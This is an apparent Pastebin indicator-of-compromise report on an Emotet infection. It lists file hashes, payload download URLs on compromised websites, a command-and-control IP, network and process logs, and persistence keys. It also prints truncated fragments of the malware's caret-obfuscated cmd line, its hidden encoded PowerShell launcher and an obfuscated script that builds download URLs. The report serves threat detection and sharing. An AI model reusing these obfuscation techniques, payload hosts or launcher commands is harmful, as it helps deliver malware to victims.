Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet #Epoch2 #packed #WMI #macro
- https://pastebin.com/NFRmXi7k
- previous_contact:
- https://pastebin.com/cNb8XhX1
- https://pastebin.com/1XfkVE5e
- https://pastebin.com/F520pqQW
- FAQ:
- https://pastebin.com/AwMK1pSh
- attack_vector
- --------------
- email attach .zip (passwd) > .doc > macro > WMI > cmd > powershell > rundll32 > dll
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638
- File name Inv_9909.zip [Zip archive data, at least v5.1 to extract]
- File size 85.41 KB (87458 bytes)
- SHA-256 1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9
- File name Inv_9909.doc [MS Word Document]
- File size 168.00 KB (172032 bytes)
- SHA-256 01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98
- File name G14C.dll [PE32 executable (DLL) (GUI) Intel 80386, for MS Windows]
- File size 342.34 KB (350552 bytes)
- activity
- **************
- PL_SCR
- 404 - http://trainwithconviction.com/wp-admin/y/!
- 404 - http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!
- 404 - https://perrasmoore.ca/wp-admin/rM6HK/!
- 200 - https://canadabrightway.com/wp-admin/n3/!
- 200 - https://upinsmokebatonrouge.com/var/Ux1V/!
- 404 - https://thelambertagency.com/staging/Vo/!
- 404 - https://stormhansen.com/2556460492/if/
- C2 12.175.220.98
- netwrk
- --------------
- 184.168.131.241 trainwithconviction.com GET /wp-admin/y/ HTTP/1.1
- 34.107.103.177 convictionfitness.ca Client Hello
- 23.235.208.88 trainwithconviction.webdmcsolutions.com GET /wp-admin/rEEEU/ HTTP/1.1
- 208.113.160.43 perrasmoore.ca Client Hello
- 107.180.50.167 canadabrightway.com Client Hello
- 12.175.220.98 12.175.220.98 POST /gxgsw/zp6s9okv78r1wfc1qx5/fnzydkyg98o1/901fuwsycvt4syqm/ HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 3704 TCP 34.107.103.177 443 ESTABLISHED
- powershell.exe 3704 TCP 23.235.208.88 80 ESTABLISHED
- powershell.exe 3704 TCP 208.113.160.43 443 ESTABLISHED
- powershell.exe 3704 TCP 107.180.50.167 443 ESTABLISHED
- rundll32.exe 3908 TCP 12.175.220.98 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- {another context}
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\system32\cmd.exe /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en
- C:\Windows\system32\msg.exe operator /v Word experienced an error trying to open the file.
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -enc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7. . .
- C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
- C:\Windows\system32\rundll32.exe C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll,AnyString
- C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll",#1
- C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",mXAAXLTXI
- C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",#1
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 21.01.2021 10:46
- iwwvfo.mzw c:\users\operator\appdata\local\lmmauwa\iwwvfo.mzw 20.01.2021 23:14
- C:\Windows\SysWOW64\rundll32.exe "C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw",ZwYQYDDIS
- drop
- --------------
- C:\Users\operator\Xk8f0bt\B7mwavb\G14C.dll
- C:\Users\operator\AppData\Local\Lmmauwa\iwwvfo.mzw
- # # #
- https://www.virustotal.com/gui/file/3e9a50b4c96a150d63f8bc0fa21be57c21ce2d5be533fad249a40f470089a638/details
- https://www.virustotal.com/gui/file/1654619b2532228600711117c58dd4f3b715f1b6973f182865b93bf186fa68c9/details
- https://www.virustotal.com/gui/file/01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98/details
- https://analyze.intezer.com/analyses/0817e716-a1c5-4208-a9e5-a1f7006ecb25
- VR
- macros>WMI>powershell
- #1
- cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAA...
- #2
- sEt ydTUW ( [tYpe]("{4}{2}{0}{3}{5}{1}" -f 'Em','TORy','T','.Io.','SyS','direC')) ; set ("u"+"aX"+"KHR") ( [TYPe]("{5}{0}{1}{4}{2}{3}{6}"-f'iNt','mAn','g','E','a','SySTEM.nET.sErvicepO',...
- #3
- ... -rePlAcE [cHAR]108[cHAR]66[cHAR]109,[cHAR]92$Htnfv2u.d ll;$Y74L=N53Q;$S8e6u_5=h tt p;$U7_xeo1=sg yw http://trainwithconviction.com/wp-admin/y/!sg yw http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/!sg ...
Add Comment
Please, Sign In to add comment